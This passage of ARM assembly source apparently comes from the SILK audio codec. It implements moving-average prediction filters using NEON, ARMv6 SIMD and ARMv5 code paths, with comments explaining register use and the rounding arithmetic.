/* 4 outputs: (in << 12) - S[0], saturating round, narrow to int16 */
vshl.s32 val4_out, val4_out, #12 /*SKP_LSHIFT(in16, 12)*/
vsub.s32 val4_out, val4_out, val4_S0 /*SKP_LSHIFT(in16, 12) - S[0]*/
vqadd.s32 val4_out, val4_out, val4_const /*qadd out32, out32, 2048*/
vqshrn.s32 val4_S0_lo, val4_out, #12
subs val_len, val_len, #4
vst1.16 val4_S0_lo, [ptr4_out]!
bge LR(2, b)
cmp tmp_len, #0
beq LR(4, f)
vst1.32 val4_S1_lo, [sp]
ldr val4_rS0, [sp] /*r6 = new [S0]*/
L(3) // Input/Output are processed 1 by 1
L(0)
ldrsh val4_in0, [ptr4_in], #2 /*in[k]*/
vext.32 val4_S1, val4_S1, val4_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val4_S2, val4_S2, val4_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val4_S3, val4_S3, val4_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vext.32 val4_S4, val4_S4, val4_S5, #1 /*shift q5 by 32bit and put 32-lsb of q6 to 32-msb q5*/
vdup.16 val4_S0, val4_in0 /*mov r0 to q1(d2, d3)*/
rsb val4_out32, val4_rS0, val4_in0, lsl #12 /*out32 = SKP_LSHIFT(in16, 12) - S[0];*/
vmlal.s16 val4_S1, val4_B0_lo, val4_S0_lo /*calculate S[0-3]*/
vmlal.s16 val4_S2, val4_B0_hi, val4_S0_lo /*calculate S[4-7]*/
vmlal.s16 val4_S3, val4_B1_lo, val4_S0_lo /*calculate S[8-11]*/
vmlal.s16 val4_S4, val4_B1_hi, val4_S0_lo /*calculate S[12-15]*/
vst1.32 val4_S1_lo, [sp]
qadd val4_out32, val4_out32, const4_2048
ssat val4_out32, #16, val4_out32, asr #12 /*out = round and sat*/
subs tmp_len, tmp_len, #1
strh val4_out32, [ptr4_out], #2
ldr val4_rS0, [sp] /*r6 = new [S0]*/
bgt LR(0, b)
L(4)
sub r2, r2, #32 /*rewind S pointer (advanced by the first vld1 above)*/
vst1.32 {val4_S1_lo, val4_S1_hi, val4_S2_lo, val4_S2_hi}, [r2]!
vst1.32 {val4_S3_lo, val4_S3_hi, val4_S4_lo, val4_S4_hi}, [r2]
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
/*SYM(SKP_Silk_MA_Prediction_ARMv7_order12):*/
/*
 * NEON path for order == 12. Same pipeline scheme as the order-8/16 paths:
 * 12 coefficients in d0-d2, 12 states in q2-q4, q5 feeds zeros into the
 * pipeline tail, q8 collects outgoing S[0] lanes. S was read with a
 * post-incremented pointer, hence the sub r2, r2, #32 before write-back.
 */
L(6)
VARDEF ptr5_in, sb
VARDEF ptr5_out, sl
VARDEF val5_rS0, r6
VARDEF val5_in0, r0
VARDEF val5_in1, r1
VARDEF const5_2048, r3
VARDEF val5_out32, r8
VARDEFD val5_B1_lo, d0
VARDEFD val5_B1_hi, d1
VARDEFD val5_B2_lo, d2
VARDEFQ val5_S1, q2
VARDEFD val5_S1_lo, d4
VARDEFD val5_S1_hi, d5
VARDEFQ val5_S2, q3
VARDEFD val5_S2_lo, d6
VARDEFD val5_S2_hi, d7
VARDEFQ val5_S3, q4
VARDEFD val5_S3_lo, d8
VARDEFD val5_S3_hi, d9
VARDEFQ val5_S4, q5
VARDEFQ val5_S0, q8
VARDEFD val5_S0_lo, d16
VARDEFQ val5_const, q7
VARDEFQ val5_in, q9
VARDEFD val5_in_lo, d18
VARDEFQ val5_out, q10
VARDEFD val5_out_lo, d20
VARDEFD val5_out_hi, d21
str r0, [sp, #sp_ptr_in] /*in*/
str r1, [sp, #sp_ptr_B] /*B*/
str r2, [sp, #sp_ptr_S] /*S*/
str r3, [sp, #sp_ptr_out] /*out*/
cmp val_len, #4
mov ptr5_in, r0 /*in*/
mov ptr5_out, r3 /*out*/
ldr val5_rS0, [r2] /*r6 = S[0]*/
vld1.16 {val5_B1_lo, val5_B1_hi, val5_B2_lo}, [r1] /*read all 12 Bs*/
vld1.32 {val5_S1_lo, val5_S1_hi, val5_S2_lo, val5_S2_hi}, [r2]! /*read first 8 Ss*/
vld1.32 {val5_S3_lo, val5_S3_hi}, [r2] /*read last 4 Ss*/
vmov.i32 val5_S4, #0 /*clear q5*/
mov const5_2048, #2048 /*r3 = 1 << 11, will be used for rounding.*/
and tmp_len, val_len, #3 /*r5 = r4 % 4 ==> numbers in second loop*/
blt LR(3, f)
vdup.32 val5_const, const5_2048 /*d12 = [2048] [2048]*/
sub val_len, val_len, #4
L(2) // Input/Output are processed 4 samples per iteration
ldrsh val5_in0, [ptr5_in], #2 /*in[k]*/
ldrsh val5_in1, [ptr5_in], #2
vext.32 val5_S0, val5_S0, val5_S1, #1 /*shift S[2k] in */
vdup.16 val5_in, val5_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val5_S1, val5_S1, val5_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val5_S2, val5_S2, val5_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val5_S3, val5_S3, val5_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val5_S1, val5_B1_lo, val5_in_lo /*calculate S[0-3]*/
vmlal.s16 val5_S2, val5_B1_hi, val5_in_lo /*calculate S[4-7]*/
vmlal.s16 val5_S3, val5_B2_lo, val5_in_lo /*calculate S[8-11]*/
vmov val5_out_lo, val5_in0, val5_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val5_S0, val5_S0, val5_S1, #1 /*shift S[2k] in */
vdup.16 val5_in, val5_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val5_S1, val5_S1, val5_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val5_S2, val5_S2, val5_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val5_S3, val5_S3, val5_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val5_S1, val5_B1_lo, val5_in_lo /*calculate S[0-3]*/
vmlal.s16 val5_S2, val5_B1_hi, val5_in_lo /*calculate S[4-7]*/
vmlal.s16 val5_S3, val5_B2_lo, val5_in_lo /*calculate S[8-11]*/
ldrsh val5_in0, [ptr5_in], #2 /*in[k]*/
ldrsh val5_in1, [ptr5_in], #2
vext.32 val5_S0, val5_S0, val5_S1, #1 /*shift S[2k] in */
vdup.16 val5_in, val5_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val5_S1, val5_S1, val5_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val5_S2, val5_S2, val5_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val5_S3, val5_S3, val5_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val5_S1, val5_B1_lo, val5_in_lo /*calculate S[0-3]*/
vmlal.s16 val5_S2, val5_B1_hi, val5_in_lo /*calculate S[4-7]*/
vmlal.s16 val5_S3, val5_B2_lo, val5_in_lo /*calculate S[8-11]*/
vmov val5_out_hi, val5_in0, val5_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val5_S0, val5_S0, val5_S1, #1 /*shift S[2k] in */
vdup.16 val5_in, val5_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val5_S1, val5_S1, val5_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val5_S2, val5_S2, val5_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val5_S3, val5_S3, val5_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val5_S1, val5_B1_lo, val5_in_lo /*calculate S[0-3]*/
vmlal.s16 val5_S2, val5_B1_hi, val5_in_lo /*calculate S[4-7]*/
vmlal.s16 val5_S3, val5_B2_lo, val5_in_lo /*calculate S[8-11]*/
/* 4 outputs: (in << 12) - S[0], saturating round, narrow to int16 */
vshl.s32 val5_out, val5_out, #12 /*SKP_LSHIFT(in16, 12)*/
vsub.s32 val5_out, val5_out, val5_S0 /*SKP_LSHIFT(in16, 12) - S[0]*/
vqadd.s32 val5_out, val5_out, val5_const /*qadd out32, out32, 2048*/
vqshrn.s32 val5_S0_lo, val5_out, #12
subs val_len, val_len, #4
vst1.16 val5_S0_lo, [ptr5_out]!
bge LR(2, b)
cmp tmp_len, #0
beq LR(4, f)
vst1.32 val5_S1_lo, [sp]
ldr val5_rS0, [sp] /*r6 = new [S0]*/
L(3) // Input/Output are processed 1 by 1
L(0)
ldrsh val5_in0, [ptr5_in], #2 /*in[k]*/
vext.32 val5_S1, val5_S1, val5_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val5_S2, val5_S2, val5_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val5_S3, val5_S3, val5_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vdup.16 val5_S0, val5_in0 /*mov r0 to q8(d16, d17)*/
rsb val5_out32, val5_rS0, val5_in0, lsl #12 /*out32 = SKP_LSHIFT(in16, 12) - S[0];*/
vmlal.s16 val5_S1, val5_B1_lo, val5_S0_lo /*calculate S[0-3]*/
vmlal.s16 val5_S2, val5_B1_hi, val5_S0_lo /*calculate S[4-7]*/
vmlal.s16 val5_S3, val5_B2_lo, val5_S0_lo /*calculate S[8-11]*/
vst1.32 val5_S1_lo, [sp]
qadd val5_out32, val5_out32, const5_2048
ssat val5_out32, #16, val5_out32, asr #12 /*out = round and sat*/
subs tmp_len, tmp_len, #1
strh val5_out32, [ptr5_out], #2
ldr val5_rS0, [sp] /*r6 = new [S0]*/
bgt LR(0, b)
L(4)
sub r2, r2, #32 /*rewind S pointer (advanced by the first vld1 above)*/
vst1.32 {val5_S1_lo, val5_S1_hi, val5_S2_lo, val5_S2_hi}, [r2]!
vst1.32 {val5_S3_lo, val5_S3_hi}, [r2]
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
/*
 * SKP_Silk_MA_Prediction_Q13: same MA prediction filter as above, but with
 * B coefficients in Q13 (input scaled by << 13, rounding shift of 13).
 * Args (AAPCS): r0 = in, r1 = B, r2 = S, r3 = out; stack: len, order.
 * Dispatch: NEON path for order 12, ARMv6 SIMD path for other even
 * orders >= 6, else the generic (odd-order) path.
 */
.set sp13_ptr_in, 0
.set sp13_ptr_B, 4
.set sp13_ptr_S, 8
.set sp13_ptr_out, 12
.globl SYM(SKP_Silk_MA_Prediction_Q13)
SYM(SKP_Silk_MA_Prediction_Q13):
stmdb sp!, {r4-r10, fp, ip, lr}
vpush {q0-q7}
vpush {q8-q11}
add fp, sp, #228
sub sp, sp, #16
/* Offsets of the stack-passed arguments after prologue + local area */
.set arg13_len, 248
.set arg13_order, 252
/*LOAD INPUT ARGS*/
VARDEF val6_order, r5
VARDEF val6_len, r4
VARDEF ptr6_in, sb
VARDEF ptr6_out, sl
VARDEF ptr6_S, ip
VARDEF ptr6_B, lr
VARDEF val6_in, r0
VARDEF val6_S0, r1
VARDEF val6_out, r1
VARDEF val6_S1, r2
VARDEF val6_S2, r3
VARDEF val6_B, r6
VARDEF val6_SO1, _r7
VARDEF val6_SO2, r8
ldr val6_order, [sp, #arg13_order] /*order*/
ldr val6_len, [sp, #arg13_len] /*len*/
ands _r7, r1, #3 /*CHECK: if ( B is 4 byte aligned ) Prerequisite for ARMv6 SIMD*/
bne LR(2, f)
ands r6, val6_order, #1 /*CHECK: if ( order % 2 == 0 ) Prerequisite for ARMv6 SIMD*/
bne LR(2, f)
cmp val6_order, #12 /*CHECK: if ( order == 12 ) ARMv7 SIMD*/
beq LR(8, f)/*SYM(SKP_Silk_MA_Prediction_Q13_ARMv7_order12)*/
cmp val6_order, #6 /*CHECK: if ( order >= 6 ) Prerequisite for ARMv6 SIMD*/
blt LR(2, f)
// ARMv6 SIMD
// order % 2 == 0: two state updates per iteration, B read pairwise as one
// 32-bit word (smlabb uses its low half, smlabt its high half).
str r0, [sp, #sp13_ptr_in]
str r1, [sp, #sp13_ptr_B]
str r2, [sp, #sp13_ptr_S]
str r3, [sp, #sp13_ptr_out]
mov ptr6_in, r0 /*in*/
mov ptr6_out, r3 /*out*/
L(0)
ldr ptr6_S, [sp, #sp13_ptr_S] /*S*/
ldr ptr6_B, [sp, #sp13_ptr_B] /*B*/
ldrsh val6_in, [ptr6_in], #2 /*in[k]*/
ldr val6_S0, [ptr6_S], #4 /*S[0]*/
ldr val6_order, [sp, #arg13_order] /*order*/
ldr val6_S1, [ptr6_S], #4 /*S[1]*/
rsb r3, val6_S0, val6_in, lsl #13 /*SKP_LSHIFT(in16, 13) - S[0]*/
ldr val6_B, [ptr6_B], #4 /*B[0], B[1]*/
mov r3, r3, asr #12
sub val6_order, val6_order, #4 /*order - 2 - 2*/
add val6_out, r3, #1 /*SKP_RSHIFT_ROUND*/
ldr val6_S2, [ptr6_S], #4 /*S[2]*/
ssat val6_out, #16, val6_out, asr #1 /*SKP_SAT16( out32 )*/
strh val6_out, [ptr6_out], #2 /*save it to out[k]*/
L(1)
smlabb val6_SO1, val6_in, val6_B, val6_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smlabt val6_SO2, val6_in, val6_B, val6_S2 /*SKP_SMLABT(S[d + 2], in16, B32)*/
ldr val6_S1, [ptr6_S], #4 /*S[d+1]*/
ldr val6_S2, [ptr6_S], #-16 /*S[d+2]*/
ldr val6_B, [ptr6_B], #4 /*B[d], B[d+1]*/
subs val6_order, val6_order, #2
str val6_SO1, [ptr6_S], #4
str val6_SO2, [ptr6_S], #16
bgt LR(1, b)
/* Last two taps: final S[order-1] has no S[order] term (smulbt) */
smlabb val6_SO1, val6_in, val6_B, val6_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smlabt val6_SO2, val6_in, val6_B, val6_S2 /*SKP_SMLABT(S[d + 2], in16, B32)*/
ldr val6_S1, [ptr6_S], #-12 /*S[d+1]*/
ldr val6_B, [ptr6_B] /*B[d], B[d+1]*/
str val6_SO1, [ptr6_S], #4
str val6_SO2, [ptr6_S], #4
smlabb val6_SO1, val6_in, val6_B, val6_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smulbt val6_SO2, val6_in, val6_B /*SKP_SMULBT(in16, B32): last state has no add term*/
subs val6_len, val6_len, #1
str val6_SO1, [ptr6_S], #4
str val6_SO2, [ptr6_S]
bgt LR(0, b)
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
/*
 * Generic (odd-order / unaligned-B) path of SKP_Silk_MA_Prediction_Q13.
 * Per sample: out[k] = SAT16(RSHIFT_ROUND((in[k] << 13) - S[0], 13));
 *             S[d] = S[d+1] + in[k]*B[d], last S gets in[k]*B[order-1].
 * S[0] is kept in a register (val7_S0, lr) across samples and written back
 * once at the end; S in memory is addressed from S+4 (the add r2, r2, #4).
 * Note B[0] is loaded into a scratch register (val7_B0, r2) so in[k]
 * stays live in r0 for all subsequent taps.
 */
VARDEF ptr7_in, r6
VARDEF ptr7_out, sb
VARDEF val7_B0, r2
VARDEF ptr7_B, _r7
VARDEF ptr7_S, r8
VARDEF val7_S0, lr
VARDEF val7_in, r0
VARDEF val7_out, r1
VARDEF val7_B, r1
VARDEF val7_S1, r3
VARDEF val7_Sout, r2
// order % 2 != 0
L(2)
add r2, r2, #4
str r0, [sp, #sp13_ptr_in]
str r1, [sp, #sp13_ptr_B]
str r2, [sp, #sp13_ptr_S]
str r3, [sp, #sp13_ptr_out]
mov ptr7_in, r0 /*in_ptr*/
mov ptr7_out, r3 /*out_ptr*/
ldr val7_S0, [r2, #-4] /*S0*/
L(0)
ldrsh val7_in, [ptr7_in], #2 /*in[k]*/
ldr val6_order, [sp, #arg13_order] /*order*/
ldr ptr7_B, [sp, #sp13_ptr_B]
ldr ptr7_S, [sp, #sp13_ptr_S] /*S_ptr*/
rsb val7_out, val7_S0, val7_in, lsl #13 /*SKP_LSHIFT(in16, 13) - S[0]*/
ldrsh val7_B0, [ptr7_B], #2 /*B[0]*/
mov val7_out, val7_out, asr #12
ldr val7_S1, [ptr7_S]
add val7_out, val7_out, #1 /*SKP_RSHIFT_ROUND*/
smlabb val7_S0, val7_in, val7_B0, val7_S1 /*S[0] = in16*B[0] + S[1]*/
ssat val7_out, #16, val7_out, asr #1 /*SKP_SAT16( out32 )*/
sub val6_order, val6_order, #3
ldr val7_S1, [ptr7_S, #4]
strh val7_out, [ptr7_out], #2
ldrsh val7_B, [ptr7_B], #2
L(1)
smlabb val7_Sout, val7_in, val7_B, val7_S1 /*S[d] = S[d+1] + in16*B[d]*/
ldr val7_S1, [ptr7_S, #8]
ldrsh val7_B, [ptr7_B], #2
str val7_Sout, [ptr7_S], #4
subs val6_order, val6_order, #1
bgt LR(1, b)
smlabb val7_Sout, val7_in, val7_B, val7_S1
ldrsh val7_B, [ptr7_B], #2
str val7_Sout, [ptr7_S], #4
smulbb val7_Sout, val7_in, val7_B /*last state: in16*B[order-1], no add term*/
subs val6_len, val6_len, #1
str val7_Sout, [ptr7_S]
bgt LR(0, b)
ldr r2, [sp, #sp13_ptr_S]
str val7_S0, [r2, #-4] /*write register-held S[0] back to memory*/
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
/*SYM(SKP_Silk_MA_Prediction_Q13_ARMv7_order12):*/
L(8)
VARDEF ptr8_in, sb
VARDEF ptr8_out, sl
VARDEF val8_rS0, r6
VARDEF const8_4096, r3
VARDEF val8_in0, r0
VARDEF val8_in1, r1
VARDEF val8_len, r5
VARDEF val8_out32, r8
VARDEFD val8_B0_lo, d0
VARDEFD val8_B0_hi, d1
VARDEFD val8_B1_lo, d2
VARDEFQ val8_S1, q2
VARDEFD val8_S1_lo, d4
VARDEFD val8_S1_hi, d5
VARDEFQ val8_S2, q3
VARDEFD val8_S2_lo, d6
VARDEFD val8_S2_hi, d7
VARDEFQ val8_S3, q4
VARDEFD val8_S3_lo, d8
VARDEFD val8_S3_hi, d9
VARDEFQ val8_S4, q5
VARDEFQ const8, q7
VARDEFQ val8_S0, q8
VARDEFD val8_S0_lo, d16
VARDEFQ val8_in, q9
VARDEFD val8_in_lo, d18
VARDEFQ val8_out, q10
VARDEFD val8_out_lo, d20
VARDEFD val8_out_hi, d21
str r0, [sp, #sp13_ptr_in] /*in*/
str r1, [sp, #sp13_ptr_B] /*B*/
str r2, [sp, #sp13_ptr_S] /*S*/
str r3, [sp, #sp13_ptr_out] /*out*/
cmp val6_len, #4
mov ptr8_in, r0 /*in*/
mov ptr8_out, r3 /*out*/
ldr val8_rS0, [r2] /*r6 = S[0]*/
vld1.16 {val8_B0_lo, val8_B0_hi, val8_B1_lo}, [r1] /*read all 16 Bs*/
vld1.32 {val8_S1_lo, val8_S1_hi, val8_S2_lo, val8_S2_hi}, [r2]! /*read first 16 Ss*/
vld1.32 {val8_S3_lo, val8_S3_hi}, [r2] /*read last 16 Ss*/
vmov.i32 val8_S4, #0 /*clear q5*/
mov const8_4096, #4096 /*r3 = 1 << 12, will be used for rounding.*/
and val8_len, val6_len, #3 /*r5 = r4 % 4 ==> numbers in second loop*/
blt LR(3, f)
vdup.32 const8, const8_4096 /*d12 = [2048] [2048]*/
sub val6_len, val6_len, #4
L(2) // Input/Output are processed SI4D
ldrsh val8_in0, [ptr8_in], #2 /*in[k]*/
ldrsh val8_in1, [ptr8_in], #2
vext.32 val8_S0, val8_S0, val8_S1, #1 /*shift S[2k] in */
vdup.16 val8_in, val8_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val8_S1, val8_S1, val8_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val8_S2, val8_S2, val8_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val8_S3, val8_S3, val8_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val8_S1, val8_B0_lo, val8_in_lo /*calculate S[0-3]*/
vmlal.s16 val8_S2, val8_B0_hi, val8_in_lo /*calculate S[4-7]*/
vmlal.s16 val8_S3, val8_B1_lo, val8_in_lo /*calculate S[8-11]*/
vmov val8_out_lo, val8_in0, val8_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val8_S0, val8_S0, val8_S1, #1 /*shift S[2k] in */
vdup.16 val8_in, val8_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val8_S1, val8_S1, val8_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val8_S2, val8_S2, val8_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val8_S3, val8_S3, val8_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val8_S1, val8_B0_lo, val8_in_lo /*calculate S[0-3]*/
vmlal.s16 val8_S2, val8_B0_hi, val8_in_lo /*calculate S[4-7]*/
vmlal.s16 val8_S3, val8_B1_lo, val8_in_lo /*calculate S[8-11]*/
ldrsh val8_in0, [ptr8_in], #2 /*in[k]*/
ldrsh val8_in1, [ptr8_in], #2
vext.32 val8_S0, val8_S0, val8_S1, #1 /*shift S[2k] in */
vdup.16 val8_in, val8_in0 /*mov r0 to q9(d2, d3)*/
vext.32 val8_S1, val8_S1, val8_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val8_S2, val8_S2, val8_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val8_S3, val8_S3, val8_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val8_S1, val8_B0_lo, val8_in_lo /*calculate S[0-3]*/
vmlal.s16 val8_S2, val8_B0_hi, val8_in_lo /*calculate S[4-7]*/
vmlal.s16 val8_S3, val8_B1_lo, val8_in_lo /*calculate S[8-11]*/
vmov val8_out_hi, val8_in0, val8_in1 /*in[2k], in[2k]+1 ==> q10*/
vext.32 val8_S0, val8_S0, val8_S1, #1 /*shift S[2k] in */
vdup.16 val8_in, val8_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val8_S1, val8_S1, val8_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val8_S2, val8_S2, val8_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val8_S3, val8_S3, val8_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vmlal.s16 val8_S1, val8_B0_lo, val8_in_lo /*calculate S[0-3]*/
vmlal.s16 val8_S2, val8_B0_hi, val8_in_lo /*calculate S[4-7]*/
vmlal.s16 val8_S3, val8_B1_lo, val8_in_lo /*calculate S[8-11]*/
vshl.s32 val8_out, val8_out, #13 /*SKP_LSHIFT(in16, 12)*/
vsub.s32 val8_out, val8_out, val8_S0 /*SKP_LSHIFT(in16, 12) - S[0]*/
vqadd.s32 val8_out, val8_out, const8 /*qadd out32, out32, LR(0, x)2048*/
vqshrn.s32 val8_S0_lo, val8_out, #13
subs val6_len, val6_len, #4
vst1.16 val8_S0_lo, [ptr8_out]!
bge LR(2, b)
cmp val8_len, #0
beq LR(4, f)
vst1.32 val8_S1_lo, [sp]
ldr val8_rS0, [sp] /*r6 = new [S0]*/
L(3) // Input/Output are processed 1 by 1
L(0)
ldrsh val8_in0, [ptr8_in], #2 /*in[k]*/
vext.32 val8_S1, val8_S1, val8_S2, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val8_S2, val8_S2, val8_S3, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vext.32 val8_S3, val8_S3, val8_S4, #1 /*shift q4 by 32bit and put 32-lsb of q5 to 32-msb q4*/
vdup.16 val8_S0, val8_in0 /*mov r0 to q8(d16, d17)*/
rsb val8_out32, val8_rS0, val8_in0, lsl #13 /*out32 = SKP_LSHIFT(in16, 12) - S[0];*/
vmlal.s16 val8_S1, val8_B0_lo, val8_S0_lo /*calculate S[0-3]*/
vmlal.s16 val8_S2, val8_B0_hi, val8_S0_lo /*calculate S[4-7]*/
vmlal.s16 val8_S3, val8_B1_lo, val8_S0_lo /*calculate S[8-11]*/
vst1.32 val8_S1_lo, [sp]
qadd val8_out32, val8_out32, const8_4096
ssat val8_out32, #16, val8_out32, asr #13 /*out = round and sat*/
subs val8_len, val8_len, #1
strh val8_out32, [ptr8_out], #2
ldr val8_rS0, [sp] /*r6 = new [S0]*/
bgt LR(0, b)
L(4)
sub r2, r2, #32
vst1.32 {val8_S1_lo, val8_S1_hi, val8_S2_lo, val8_S2_hi}, [r2]!
vst1.32 {val8_S3_lo, val8_S3_hi}, [r2]
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
#elif EMBEDDED_ARM>=5
/*
* void SKP_Silk_MA_Prediction(
* const SKP_int16 *in, I: input signal
* const SKP_int16 *B, I: MA coefficients, Q13 [order+1]
* SKP_int32 *S, I/O: state vector [order]
* SKP_int16 *out, O: output signal
* const SKP_int32 len, I: signal length
* const SKP_int32 order I: filter order
* )
*
*
*/
/* ARMv5 implementation of SKP_Silk_MA_Prediction() (C prototype in the
 * comment block above).  Two code paths:
 *   - fall-through: order is even, >= 6, and B is word aligned, so two
 *     16-bit coefficients are fetched per 32-bit load and consumed with
 *     smlabb/smlabt;
 *   - L(9): halfword fallback for odd order, order < 6, or unaligned B.
 * Per output sample: out[k] = round/sat((in[k] << 12) - S[0]) and the
 * state FIFO is shifted down one slot with S[d] = S[d+1] + in[k]*B[d].
 * NOTE(review): sb/sl/_r7 are register aliases from the surrounding
 * macro framework (presumably r9/r10/r7 -- see SKP_Silk_AsmPreproc.h). */
VARDEF ma_in, sb /* input pointer (reads in[k]) */
VARDEF ma_out, sl /* output pointer (writes out[k]) */
VARDEF ma_s, ip /* state pointer S */
VARDEF ma_b, lr /* coefficient pointer B */
VARDEF ma_len, r4 /* remaining output samples */
VARDEF ma_in_val, r0 /* current input sample in[k] */
VARDEF ma_s0_val, r1 /* S[0] */
VARDEF ma_s1_val, r2 /* S[d+1] */
VARDEF ma_order, r5 /* inner-loop counter derived from order */
VARDEF ma_b_val, r6 /* packed coefficient pair B[d], B[d+1] */
VARDEF ma_tmp0, r3
VARDEF ma_out_val, r1 /* output accumulator (aliases ma_s0_val) */
VARDEF ma_const0, r3 /* rounding constant (aliases ma_tmp0) */
VARDEF ma_s2_val, r3 /* S[d+2] (aliases ma_tmp0) */
#ifdef IPHONE
VARDEF ma_new_s1, r8
VARDEF ma_new_s2, _r7
#else
VARDEF ma_new_s1, _r7
VARDEF ma_new_s2, r8
#endif
/* Spill slots (relative to sp after the prologue) for the 4 pointer args. */
.set SAVE_IN, 0
.set SAVE_B, 4
.set SAVE_S, 8
.set SAVE_OUT, 12
.globl SYM(SKP_Silk_MA_Prediction)
SYM(SKP_Silk_MA_Prediction):
stmdb sp!, {r4-r10, fp, ip, lr} /* save 10 regs (40 bytes) */
add fp, sp, #36
sub sp, sp, #16 /* room for SAVE_IN..SAVE_OUT */
/* Stack offsets of the 5th/6th C arguments after push + sub above. */
.set arg_len, 56
.set arg_order, 60
/*LOAD INPUT ARGS*/
ldr ma_order, [sp, #arg_order]
ldr ma_len, [sp, #arg_len]
ands _r7, r1, #3 /* B not word aligned? -> halfword path */
bne LR(9, f)/*MA_Prediction_ORDER_2BYTE*/
ands r6, ma_order, #1 /* odd order? -> halfword path */
bne LR(9, f)/*MA_Prediction_ORDER_2BYTE*/
cmp ma_order, #6 /* short filters also use the halfword path */
blt LR(9, f)/*MA_Prediction_ORDER_2BYTE*/
// order % 2 == 0
str r0, [sp, #SAVE_IN]
str r1, [sp, #SAVE_B]
str r2, [sp, #SAVE_S]
str r3, [sp, #SAVE_OUT]
mov ma_in, r0
mov ma_out, r3
/* Outer loop: one output sample per iteration. */
L(0)
ldr ma_s, [sp, #SAVE_S]
ldr ma_b, [sp, #SAVE_B]
ldrsh ma_in_val, [ma_in], #2
ldr ma_s0_val, [ma_s], #4
ldr ma_order, [sp, #arg_order]
ldr ma_s1_val, [ma_s], #4
rsb ma_tmp0, ma_s0_val, ma_in_val, lsl #12 /* tmp = (in16 << 12) - S[0] */
ldr ma_b_val, [ma_b], #4 /* B[0], B[1] packed in one word */
qadd ma_out_val, ma_tmp0, ma_tmp0 /* four saturating doublings ... */
sub ma_order, ma_order, #4 /* order - 2 - 2 */
mov ma_const0, #32768
qadd ma_out_val, ma_out_val, ma_out_val
qadd ma_out_val, ma_out_val, ma_out_val
qadd ma_out_val, ma_out_val, ma_out_val /* ... = sat(16 * tmp) */
qadd ma_out_val, ma_out_val, ma_const0 /* + 0x8000: rounding bias */
ldr ma_s2_val, [ma_s], #4
mov ma_out_val, ma_out_val, asr #16 /* round + narrow to 16 bits */
strh ma_out_val, [ma_out], #2
sub r1, ma_s, #12 /* r1 = S write-back ptr (3 words behind reads) */
/* Inner loop: shift the state FIFO down two entries per iteration. */
L(1)
smlabb ma_new_s1, ma_in_val, ma_b_val, ma_s1_val /* S[d+1] + in16*B[d] */
